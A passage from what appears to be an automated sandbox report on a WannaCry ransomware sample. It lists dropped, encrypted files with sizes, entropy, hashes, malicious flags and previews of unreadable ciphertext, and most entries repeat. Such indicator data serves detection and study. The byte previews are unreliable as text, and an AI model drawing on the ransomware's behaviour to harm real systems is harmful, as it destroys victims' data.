                                                                                      Entropy (8bit):7.999853457606675
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:7ydp5WRV52a/VscgbyxyJNiOGrTU3JNcYPtyByz5wH05B4De9q:7ydp5gVFCexyAGHPPtkyz5wH05uSq
                                                                                      MD5:7B3A6EFBC15147D2AC7EF75384ADB1D5
                                                                                      SHA1:5D1F877FACAE47C638DD18EA1A92E4776B2FC94A
                                                                                      SHA-256:93185BFD1537DA99792A24B88973AC376E4EE39C320320522A86E8C742CA55FD
                                                                                      SHA-512:5D5B941DA24EBE7712AA3D1ACF6D30382B8A192B1D7B2B6B30AE126463ED98366DF40357DBAEF19ECEC8CBB7A55B6192DAC6F3D8FDEB9651AE858BFE55A802BE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|_.[@w..e..)p......).X..o...3z..$2hx..&..k.okL..P.'x>Z..].IW...M~..d..eV..>R...X+<g.cy-....d...!..L(>=a..+Q.#)=.~8.@.....[<....uK,Y.Q.%,]6.......z.B...@.g.JZ#..>2.....|..n..TJ.m.m..F..uFP.1.|...m.rI.y..z... c.>...J...W2.Mv....vgF..c.#...k.....Z....D.......R.V.{,c.Y..y...O{...T.]"y.VC....}....|..<..J..k.<E.A..d...>.H..E>q..a..n.....3..S.[*..aF.,.........) w..8.j. ..EE.E.m.H@.`. ....k....."g.}^......Y%.*f..T....z.t.C.........|.d.R.<...Dp....n.&..%-...o.|...q....j..m).|C...f....#.....7.....?....h.7.k..^,Y4P..n....kB..*h.8LN.2.s.Xn....%.../9.+rw..H....f[=.?EuN..<-x.:..n.E.5Y.....z..".z.Zty.A...4Pc...1+..<.t:.Q.U.,.:;........'.i...6x....._9...(<.^...X.\.g..d$Q.]..x..u.t.....\.....j...N............#...(..\....B..aI[,...',S...O_.....6L...!i...A>t..5.Kea.D........~p..kT...'.:....4<.=......?...!...1...O...qn...!...._.Hyt..&.B.J.......%.<..F.......9....0T~:y..z..<..j@..,....\..`..J...{.n@.zl.....K..6Q.y^.{...y.`...kI64p..%B.v.0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1179240
                                                                                      Entropy (8bit):7.999853457606675
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:7ydp5WRV52a/VscgbyxyJNiOGrTU3JNcYPtyByz5wH05B4De9q:7ydp5gVFCexyAGHPPtkyz5wH05uSq
                                                                                      MD5:7B3A6EFBC15147D2AC7EF75384ADB1D5
                                                                                      SHA1:5D1F877FACAE47C638DD18EA1A92E4776B2FC94A
                                                                                      SHA-256:93185BFD1537DA99792A24B88973AC376E4EE39C320320522A86E8C742CA55FD
                                                                                      SHA-512:5D5B941DA24EBE7712AA3D1ACF6D30382B8A192B1D7B2B6B30AE126463ED98366DF40357DBAEF19ECEC8CBB7A55B6192DAC6F3D8FDEB9651AE858BFE55A802BE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|_.[@w..e..)p......).X..o...3z..$2hx..&..k.okL..P.'x>Z..].IW...M~..d..eV..>R...X+<g.cy-....d...!..L(>=a..+Q.#)=.~8.@.....[<....uK,Y.Q.%,]6.......z.B...@.g.JZ#..>2.....|..n..TJ.m.m..F..uFP.1.|...m.rI.y..z... c.>...J...W2.Mv....vgF..c.#...k.....Z....D.......R.V.{,c.Y..y...O{...T.]"y.VC....}....|..<..J..k.<E.A..d...>.H..E>q..a..n.....3..S.[*..aF.,.........) w..8.j. ..EE.E.m.H@.`. ....k....."g.}^......Y%.*f..T....z.t.C.........|.d.R.<...Dp....n.&..%-...o.|...q....j..m).|C...f....#.....7.....?....h.7.k..^,Y4P..n....kB..*h.8LN.2.s.Xn....%.../9.+rw..H....f[=.?EuN..<-x.:..n.E.5Y.....z..".z.Zty.A...4Pc...1+..<.t:.Q.U.,.:;........'.i...6x....._9...(<.^...X.\.g..d$Q.]..x..u.t.....\.....j...N............#...(..\....B..aI[,...',S...O_.....6L...!i...A>t..5.Kea.D........~p..kT...'.:....4<.=......?...!...1...O...qn...!...._.Hyt..&.B.J.......%.<..F.......9....0T~:y..z..<..j@..,....\..`..J...{.n@.zl.....K..6Q.y^.{...y.`...kI64p..%B.v.0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1010680
                                                                                      Entropy (8bit):7.999810819089784
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:mldBHCsxWLzSe72dRZiCPMOLvg2G+K+eY9r4U590yNYPjBkc:sdBHCs472drfi2LK+e4lbNYPjb
                                                                                      MD5:25E976BFA146CB435271957807CD4043
                                                                                      SHA1:663EB0CEF4517FE79CE838BE21E534270B7D1FAD
                                                                                      SHA-256:507BBC33213CB29A8F0D588D604926F341B04A8BDD0CEB1811B8089D16290577
                                                                                      SHA-512:BD74E26965EFF62AC700A9ECC65C8D5B8412E00DFCA0D0B6DC7261E17C07EBC182D4831CCA4817C22AFE4F98BDF1CAD6038227A161CCC920E47CA04072703193
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@...i...E..XC"'+._i...7.D6.t./8.....6....N.mG.-..,8a-[.Uxj#_.:.......W..2..G\4.a.$.QO j...3....M.l...5.^..`b.....8..Gt.'..........g$...kG.O.!.pQg6..N.T.g.n7.a.0.:o.......-..W)...dB..._?I....n..U...W.N....P.H..gc....!.......yv....d.!..~[[$.....j......<Z.?o......*o.wf...A....A.!G!j.....B....!...4.f{IF..;tg..u.`...*%............\.9...Gk...Z.4.......b...S.........Xk.2.C.../"..$..il<.f..RPy..&Q.~.p...C./+T.!N..F.+..U.3.6l8.Cq.......!*.b`i.[?Y07.....B...8.N`(......c...'.......)5..~.....fg..Yt.=_............O..,..YC.c....`....o.r..?_....(.|k..d.M.h4.b.j....J.y.....! ...s>.....P.tk.pj....-;.xa..N...P.H..!`..0.6d3D..Y......?..!...v...<.6J.S...*..I... r..[....CF...g.K......e=....(.@...k.2.$..}.p ....i..=G.~........[..... .A+.^..uA....&)..n#....$....L..+.....i.@.6.....ov...<....o...=.R..I.c.....L...UW.~...W..^...kQ.....K0. I......P$....Y.a.Ev..LF9...c...'d...|}:;...s.>%.9......P`.O...P.?.}..z|....e._...Z.vh......xO.6w..?....jj6.C..Ev....]......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1010680
                                                                                      Entropy (8bit):7.999810819089784
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:mldBHCsxWLzSe72dRZiCPMOLvg2G+K+eY9r4U590yNYPjBkc:sdBHCs472drfi2LK+e4lbNYPjb
                                                                                      MD5:25E976BFA146CB435271957807CD4043
                                                                                      SHA1:663EB0CEF4517FE79CE838BE21E534270B7D1FAD
                                                                                      SHA-256:507BBC33213CB29A8F0D588D604926F341B04A8BDD0CEB1811B8089D16290577
                                                                                      SHA-512:BD74E26965EFF62AC700A9ECC65C8D5B8412E00DFCA0D0B6DC7261E17C07EBC182D4831CCA4817C22AFE4F98BDF1CAD6038227A161CCC920E47CA04072703193
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@...i...E..XC"'+._i...7.D6.t./8.....6....N.mG.-..,8a-[.Uxj#_.:.......W..2..G\4.a.$.QO j...3....M.l...5.^..`b.....8..Gt.'..........g$...kG.O.!.pQg6..N.T.g.n7.a.0.:o.......-..W)...dB..._?I....n..U...W.N....P.H..gc....!.......yv....d.!..~[[$.....j......<Z.?o......*o.wf...A....A.!G!j.....B....!...4.f{IF..;tg..u.`...*%............\.9...Gk...Z.4.......b...S.........Xk.2.C.../"..$..il<.f..RPy..&Q.~.p...C./+T.!N..F.+..U.3.6l8.Cq.......!*.b`i.[?Y07.....B...8.N`(......c...'.......)5..~.....fg..Yt.=_............O..,..YC.c....`....o.r..?_....(.|k..d.M.h4.b.j....J.y.....! ...s>.....P.tk.pj....-;.xa..N...P.H..!`..0.6d3D..Y......?..!...v...<.6J.S...*..I... r..[....CF...g.K......e=....(.@...k.2.$..}.p ....i..=G.~........[..... .A+.^..uA....&)..n#....$....L..+.....i.@.6.....ov...<....o...=.R..I.c.....L...UW.~...W..^...kQ.....K0. I......P$....Y.a.Ev..LF9...c...'d...|}:;...s.>%.9......P`.O...P.?.}..z|....e._...Z.vh......xO.6w..?....jj6.C..Ev....]......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1042184
                                                                                      Entropy (8bit):7.999838633052289
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:bZtQCti4SyztLB3RCUZJCE17yBF1I8G9fDKATn2Fnj9U6JME/ce:XQuXS4tL5fZEENy71o9rKAT2Fn66JMER
                                                                                      MD5:CEC650FBCF9A0A783FF71EA06F961B9A
                                                                                      SHA1:7364F6CE4C26E69D9DC711F981827933A5D285FC
                                                                                      SHA-256:EE1F109FA19BB47E89205EB382F98B56BF5DC21155A64A5F93569ACF80F0DD86
                                                                                      SHA-512:C41F24B27AFF6128989A46884FCA50B7CF2361E8E9A5C9381EC5FBDB04188EA5500711D1F40F36287AE13D6E4B639D5DC1DEB6DE02F732FDE734717E6F758228
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....<...;.....8x.5<.{2W..@......3.0W..sw...>...:..4.0.....FuK. M2z._.....>OL..g5..3(.XksYt.d..FV...a.M_O..).Y...%..<}...U..T..+x..D,..H...6.-...[...;...F:...1.y1=.e.q}qk._i#}..u.`e.....A7a...>k..3.{.G.*+..d,.. ...N`l.a..WBet...)Q.L.\..Y..oE..i.bl0.?.2D.............m3<..G.a7.a...|n.........'.j..........w....]i{.`S.|.==.25.n.th..zu.i".H.$.U.$s...d..QZ.....7......on.v.??..../..c..7.]..F4.Q...`G...'t.....+......m...@..$....#.zO...I....+......N7.X...d.......$....{4..X....l..Wo..\hE.]......3Z..........$5........+.(5..@...{....++.......#...Z......:Vx.m,.......s..].[i..Y..O*j..d.>F..7.k....*....$S..E,...{..Wp]....4...B.....\4..a.0_...[L..$..!9].....'OkUR...x.2..."X....}*.....9..>.......",..2c.7.d.D.u..mN.|1S...'...p&.w...h],...?.......-.IPc.F..y.._....x&...0......D.^.f. ...4....[f.Y2.'&9......B...$...f.L}o..u.V-.......... .s.qx....p.5.V.....u...S.#..v.....*C....-A...}.....rV%..s...6.C....`....B..M....C....GmE.I...N7.......&6...B..56.#. .
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1042184
                                                                                      Entropy (8bit):7.999838633052289
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:bZtQCti4SyztLB3RCUZJCE17yBF1I8G9fDKATn2Fnj9U6JME/ce:XQuXS4tL5fZEENy71o9rKAT2Fn66JMER
                                                                                      MD5:CEC650FBCF9A0A783FF71EA06F961B9A
                                                                                      SHA1:7364F6CE4C26E69D9DC711F981827933A5D285FC
                                                                                      SHA-256:EE1F109FA19BB47E89205EB382F98B56BF5DC21155A64A5F93569ACF80F0DD86
                                                                                      SHA-512:C41F24B27AFF6128989A46884FCA50B7CF2361E8E9A5C9381EC5FBDB04188EA5500711D1F40F36287AE13D6E4B639D5DC1DEB6DE02F732FDE734717E6F758228
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....<...;.....8x.5<.{2W..@......3.0W..sw...>...:..4.0.....FuK. M2z._.....>OL..g5..3(.XksYt.d..FV...a.M_O..).Y...%..<}...U..T..+x..D,..H...6.-...[...;...F:...1.y1=.e.q}qk._i#}..u.`e.....A7a...>k..3.{.G.*+..d,.. ...N`l.a..WBet...)Q.L.\..Y..oE..i.bl0.?.2D.............m3<..G.a7.a...|n.........'.j..........w....]i{.`S.|.==.25.n.th..zu.i".H.$.U.$s...d..QZ.....7......on.v.??..../..c..7.]..F4.Q...`G...'t.....+......m...@..$....#.zO...I....+......N7.X...d.......$....{4..X....l..Wo..\hE.]......3Z..........$5........+.(5..@...{....++.......#...Z......:Vx.m,.......s..].[i..Y..O*j..d.>F..7.k....*....$S..E,...{..Wp]....4...B.....\4..a.0_...[L..$..!9].....'OkUR...x.2..."X....}*.....9..>.......",..2c.7.d.D.u..mN.|1S...'...p&.w...h],...?.......-.IPc.F..y.._....x&...0......D.^.f. ...4....[f.Y2.'&9......B...$...f.L}o..u.V-.......... .s.qx....p.5.V.....u...S.#..v.....*C....-A...}.....rV%..s...6.C....`....B..M....C....GmE.I...N7.......&6...B..56.#. .
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1681000
                                                                                      Entropy (8bit):7.999892292277427
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:zgp6tqPUKCNqi/AiJIhtQO/MUyrWOTPoyl2VqKyosp:kk4PUKCNP/fU/Vyr3TP6sp
                                                                                      MD5:AE22DE7C398AC2B1E4122E2AD1B712AF
                                                                                      SHA1:99F651FF84401C21EF5E762AA0A50888E0B4E6B9
                                                                                      SHA-256:3D8710FDBE1DBB87C7EE3DE0DCCACAD66EDC867294563CADDF5C78A87E709059
                                                                                      SHA-512:F96C5C35A9E626CCE9BDDCE410F4A977A3EE859691A33CF2877B5DA85B74B0F5F2FDC7713F64968C6A355122A4582E2DF6B64D8A71CCBBD32F5C0256E5D00D18
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N.<.Yw.B....XS1....=..K...^..L....<.0...........5g}.d...5&.D.-.....M!j...%&.y.rE..X...yL.q..o:..hl[.;-...........X.k%v........f..Pn.Khd.>...t..dB ...{......O.H....{..J. .^J.I.......m.N:.../..e..(w=.....(T..("CM|.~.G..U...7.A.4c...z1Q.S.VO.`....K..............I..86....7.e..,.b..<...^De..I...Q..A..qw..b<.c.qRr...T...D.B_..wA.wc%..,.l.....P\..8..'(.Z.....=.,|...;..R.P..,........)Cq. ..f..|.s.K.....M7lD.]..o.f..oo.....g....7..t..E. ...y_..d.2...P{9.,.).U.=....6.....*.CL.T.A....fge.4.9-...n@Z.".K../.C#l.......M..u...'S...fe.yb.'.\.s!.4..\?1.)w.G..>..'...(.T..i{..".G.IL.F;..9n9.._^.........'0.'.?.*..W....31i5_..].0..zC.{.y.{.....] /3..dp@..R3+p{.gu.p...S....%qz...g.M.........kk.}.,..A.y...:v%........)...8..HAo(^....I..E...W[.9K_.x....N...B..mu..:t....2...y.W../-"t.....F_.'.z..l(0.d-..{....(..sG..3'....y....j@`.f.um.T:.q.....t.a>|.,v.....{.P....^Q.].yE......g.u..2y.Y.}...?].?0.........2%r.C.K!.C.q@r.RK...}.n0......Y......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1681000
                                                                                      Entropy (8bit):7.999892292277427
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:zgp6tqPUKCNqi/AiJIhtQO/MUyrWOTPoyl2VqKyosp:kk4PUKCNP/fU/Vyr3TP6sp
                                                                                      MD5:AE22DE7C398AC2B1E4122E2AD1B712AF
                                                                                      SHA1:99F651FF84401C21EF5E762AA0A50888E0B4E6B9
                                                                                      SHA-256:3D8710FDBE1DBB87C7EE3DE0DCCACAD66EDC867294563CADDF5C78A87E709059
                                                                                      SHA-512:F96C5C35A9E626CCE9BDDCE410F4A977A3EE859691A33CF2877B5DA85B74B0F5F2FDC7713F64968C6A355122A4582E2DF6B64D8A71CCBBD32F5C0256E5D00D18
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N.<.Yw.B....XS1....=..K...^..L....<.0...........5g}.d...5&.D.-.....M!j...%&.y.rE..X...yL.q..o:..hl[.;-...........X.k%v........f..Pn.Khd.>...t..dB ...{......O.H....{..J. .^J.I.......m.N:.../..e..(w=.....(T..("CM|.~.G..U...7.A.4c...z1Q.S.VO.`....K..............I..86....7.e..,.b..<...^De..I...Q..A..qw..b<.c.qRr...T...D.B_..wA.wc%..,.l.....P\..8..'(.Z.....=.,|...;..R.P..,........)Cq. ..f..|.s.K.....M7lD.]..o.f..oo.....g....7..t..E. ...y_..d.2...P{9.,.).U.=....6.....*.CL.T.A....fge.4.9-...n@Z.".K../.C#l.......M..u...'S...fe.yb.'.\.s!.4..\?1.)w.G..>..'...(.T..i{..".G.IL.F;..9n9.._^.........'0.'.?.*..W....31i5_..].0..zC.{.y.{.....] /3..dp@..R3+p{.gu.p...S....%qz...g.M.........kk.}.,..A.y...:v%........)...8..HAo(^....I..E...W[.9K_.x....N...B..mu..:t....2...y.W../-"t.....F_.'.z..l(0.d-..{....(..sG..3'....y....j@`.f.um.T:.q.....t.a>|.,v.....{.P....^Q.].yE......g.u..2y.Y.}...?].?0.........2%r.C.K!.C.q@r.RK...}.n0......Y......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80072
                                                                                      Entropy (8bit):7.997735268304214
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:5KB1c44duWNM/8YZetOZj3EQwgsVZJMxPqVUjypS5xrsndWTPbOPhP6gY:wF4dDNE5xCLJMxPzjNBsnSPihY
                                                                                      MD5:72CDB860E8B5F14ACE632074926123B1
                                                                                      SHA1:3B57975E85A3A241CECF2162FE59CAC9724E4A54
                                                                                      SHA-256:BD07533B465CA3816E0044401085151CF0AEC3A6B7E9ECC456FE120106E84B6B
                                                                                      SHA-512:188FF827AADD364AC837AE283AA91CBF7E883C6D4F1EED24ADEFA1AD4FA9045C35213AFB2551866FCBA467721135712C5F884CBC582BD2854D2925EF156C805B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....A.T...N@...."W....]..gd&.6IM.......x..q.Q...dE%..S..Yv...M.T...&@....{....?Kb|isu4qlNba\jz(....I....Rv.J.\.E.D..7Y......8.P.a........n....<.m.P...S..K]....Dv.l....%.......w.#....l8.T.V...F..a..z..P[..u..ZY6....S`o`..t..c..G.Xl...&.,O..*.....5......7......i.6..u...m.>.*..$.m...3Ns..+m..a........[.$...~h."m..i].z.AQ......Z.=...&...E3.r.W..x.c...m|v.Q.Af..m~...j...iL1...&*o-J...t.,xH...~y?,...PHu..<..'B..g...M.uE..h.lA.p......|..^%.....@..&u.o............CaE.`gm..2::W@.......K.........d.r.%..[8|(5&..]*.K....*,........?a..*.%.3......n...AqSrb.0E....~......g....u....h..n.-...l./Q|%..Gt.1x...)..3e.......k..@.Q...6o+..p..{.>....C?..9.{.@i_.'..n.L..M8.UK.E.#-.....k.9{.}K..3.Dn...S...5d..bP...9.q.y.....22o.d;.g....~.So.s!&....w...0..:....u....^...7@.5b.Z.....JL..+......@y...Z5)w..........~...Z.R..6..]QZ4..x......n.Q&W..+.....2..w....G.S).cMCT.do6H.....`m....b9.8....\.kR..<..%.Pw.......R.$ts..I."...V.-... .].C~....fG......M..!.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80072
                                                                                      Entropy (8bit):7.997735268304214
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:5KB1c44duWNM/8YZetOZj3EQwgsVZJMxPqVUjypS5xrsndWTPbOPhP6gY:wF4dDNE5xCLJMxPzjNBsnSPihY
                                                                                      MD5:72CDB860E8B5F14ACE632074926123B1
                                                                                      SHA1:3B57975E85A3A241CECF2162FE59CAC9724E4A54
                                                                                      SHA-256:BD07533B465CA3816E0044401085151CF0AEC3A6B7E9ECC456FE120106E84B6B
                                                                                      SHA-512:188FF827AADD364AC837AE283AA91CBF7E883C6D4F1EED24ADEFA1AD4FA9045C35213AFB2551866FCBA467721135712C5F884CBC582BD2854D2925EF156C805B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....A.T...N@...."W....]..gd&.6IM.......x..q.Q...dE%..S..Yv...M.T...&@....{....?Kb|isu4qlNba\jz(....I....Rv.J.\.E.D..7Y......8.P.a........n....<.m.P...S..K]....Dv.l....%.......w.#....l8.T.V...F..a..z..P[..u..ZY6....S`o`..t..c..G.Xl...&.,O..*.....5......7......i.6..u...m.>.*..$.m...3Ns..+m..a........[.$...~h."m..i].z.AQ......Z.=...&...E3.r.W..x.c...m|v.Q.Af..m~...j...iL1...&*o-J...t.,xH...~y?,...PHu..<..'B..g...M.uE..h.lA.p......|..^%.....@..&u.o............CaE.`gm..2::W@.......K.........d.r.%..[8|(5&..]*.K....*,........?a..*.%.3......n...AqSrb.0E....~......g....u....h..n.-...l./Q|%..Gt.1x...)..3e.......k..@.Q...6o+..p..{.>....C?..9.{.@i_.'..n.L..M8.UK.E.#-.....k.9{.}K..3.Dn...S...5d..bP...9.q.y.....22o.d;.g....~.So.s!&....w...0..:....u....^...7@.5b.Z.....JL..+......@y...Z5)w..........~...Z.R..6..]QZ4..x......n.Q&W..+.....2..w....G.S).cMCT.do6H.....`m....b9.8....\.kR..<..%.Pw.......R.$ts..I."...V.-... .].C~....fG......M..!.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):988600
                                                                                      Entropy (8bit):7.999845858451964
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:FacNLSoAeeqv+NTeeif3ttW9ppUIiO2yrnEb/1z8gvTJBse9psngScDwkPXZogNN:I4LoeieFLWarsEbNdvTLsngtDdhokMKv
                                                                                      MD5:64F1A06058F52DDCB3698AC488808633
                                                                                      SHA1:D0852D9D9E17E3922F2FA3F110013C371CC7DEAF
                                                                                      SHA-256:EF9AA4B2EF218F58EEACA26CD03AED79B35BB4276A04FD9614B86798EE517553
                                                                                      SHA-512:DA210C4DA9BBAE99E5C2D0BF4218B187DA49EB2B65166D8FF65D125B8A2B25B2F3904F54E30B7DB93C310B9211B60543A72BB9F8E6BCC45D6329E57C87E31F1A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....~...#..^...J...........X\?........>.\z4%....j....Z*?....Z.?.......^.R..7.R..R.T...YwJ....4..x.MoXb._.Z..~..5bSzl$kB6.x.P,g..3U9..Xq..*o*..x..c.uR..V....Sn..W:.{....u......|k...0h...k0.^.4....s...W[...9.(..qu..e.o..JB.\-/"\w$.;~<..O.Y..................P.z..Tt..'V..=u.).y...|~M.Zy.1......#..2...r...N..'.3^p..F...!}4.6.Z.....b..u..J.p}..7..a.\....Od..Np.a..78......AiGX>;)S~..O.rh.&.....}.&.`..]..%.....~.+QVbn..@.PR...."&u.....-.(pC.`h...qm......+. ...v5...........N...VA......c|^...."*T.......h.....{..U...q..s....{..K.....R..,{...P`.2...........K8.d!...9U....O.'LH....Z...M.$.V...3...2d..K..p.P=..I...~>!z+.,..A_.h.Cw.[..i..5..........}..>{.8.R.l.];.-.u...D3r.G().|.cL...R.b9..HW.....w.-..&.4._U\(Z1..[.j...@T.M..{q..`{.B8.".......f.F.~O].....,U.z. /.@.}...u.W...-9....,#..L... .y.WpQ.r.~@.s5..q>H.....3...=.......:.`.+..{.......x..pZ.vrc.z&.E.E..t..g...T..M.EI+7.,2.?...Y;.G....t......X...\......k+..dV..$..e..G.q!.d..^..G.!h.`.t......C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):988600
                                                                                      Entropy (8bit):7.999845858451964
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:FacNLSoAeeqv+NTeeif3ttW9ppUIiO2yrnEb/1z8gvTJBse9psngScDwkPXZogNN:I4LoeieFLWarsEbNdvTLsngtDdhokMKv
                                                                                      MD5:64F1A06058F52DDCB3698AC488808633
                                                                                      SHA1:D0852D9D9E17E3922F2FA3F110013C371CC7DEAF
                                                                                      SHA-256:EF9AA4B2EF218F58EEACA26CD03AED79B35BB4276A04FD9614B86798EE517553
                                                                                      SHA-512:DA210C4DA9BBAE99E5C2D0BF4218B187DA49EB2B65166D8FF65D125B8A2B25B2F3904F54E30B7DB93C310B9211B60543A72BB9F8E6BCC45D6329E57C87E31F1A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....~...#..^...J...........X\?........>.\z4%....j....Z*?....Z.?.......^.R..7.R..R.T...YwJ....4..x.MoXb._.Z..~..5bSzl$kB6.x.P,g..3U9..Xq..*o*..x..c.uR..V....Sn..W:.{....u......|k...0h...k0.^.4....s...W[...9.(..qu..e.o..JB.\-/"\w$.;~<..O.Y..................P.z..Tt..'V..=u.).y...|~M.Zy.1......#..2...r...N..'.3^p..F...!}4.6.Z.....b..u..J.p}..7..a.\....Od..Np.a..78......AiGX>;)S~..O.rh.&.....}.&.`..]..%.....~.+QVbn..@.PR...."&u.....-.(pC.`h...qm......+. ...v5...........N...VA......c|^...."*T.......h.....{..U...q..s....{..K.....R..,{...P`.2...........K8.d!...9U....O.'LH....Z...M.$.V...3...2d..K..p.P=..I...~>!z+.,..A_.h.Cw.[..i..5..........}..>{.8.R.l.];.-.u...D3r.G().|.cL...R.b9..HW.....w.-..&.4._U\(Z1..[.j...@T.M..{q..`{.B8.".......f.F.~O].....,U.z. /.@.}...u.W...-9....,#..L... .y.WpQ.r.~@.s5..q>H.....3...=.......:.`.+..{.......x..pZ.vrc.z&.E.E..t..g...T..M.EI+7.,2.?...Y;.G....t......X...\......k+..dV..$..e..G.q!.d..^..G.!h.`.t......C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5653560
                                                                                      Entropy (8bit):7.999963979136128
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:V6ttRZH+ogsvSnlcoWwEnpXu1KP5h7J7vyG/GjbNU+nCEzR0r6LHJTw:CjZssklCpX4KhhFbjGvNfCEztLpTw
                                                                                      MD5:A64E73712EE044FF36A6F57842E133E0
                                                                                      SHA1:1053535CF335BB4426B05BCA7E935E0F900E304A
                                                                                      SHA-256:9FE826403764711215EA2820A5B5371F16CB4EAD54096EADD5E61569C7D10BDF
                                                                                      SHA-512:C136B030E6EAF3A198A18FBB5BA3856BAAFCF5D70C7DC15A1BE3B63640B9B27570393B8B90CB0370B987D0FE7A5E99D8F2640D20577D7839F691CC8C77BFDE02
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......'@B..8.w2......lV..s..d..C.C.9q.......Kef..wh....:...._>.._+.. ....?..k..(>t.C.V.........%FqG.s....@...zD.W/...g..:b3..\.G.-... .,.....1g.?^.L..+.%......JQ..!.P._.<..cE..j!...0......^..l&.......P|..)...e.!...ET....E..!o..J...X.U..=.DU.m2.....CV......r.h.t..=.=z..;l1..d...:..oC.c....D..]6....=.....0.L<.....ei..W..~@.R=.....}.M.....W..n.@:.`.%......Tx'.0.n[...c+.*......J..f..).(h3.'}[..~......,ul).....p.6..".. UT$..iXw.^..[."....uVz...D.v......O.1..#.I..+..x.J...k..L........Gt.....!..xx.X..i:.7H....u..P=...o....|...<.j..p.&.o.Y.t.F.)C.3...+..4...w.s....`o.....F$..3.....z(X..B.5r).....x......c.7....I...K.O4...J'.w..0M;UbC.l..F=3.y2X...28.......rL...((i..........#.Xu...F...^..qu....fW...Xtq...[.C.-d..O..lR.?...b....o..d'.n..Y..=.2H..sg..K...b'.I.hj.k..."N.t..gy..3.{...h4.....23....k..e.....+..z5.hpF.....""t/.W{)....--.q.X.=.$....._.c.D..=...M-C.@J......E.0.....'J%%N*..u..a."vX.&.yds...........b6...g..6$.N..).-...|.>..b;Kd.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5653560
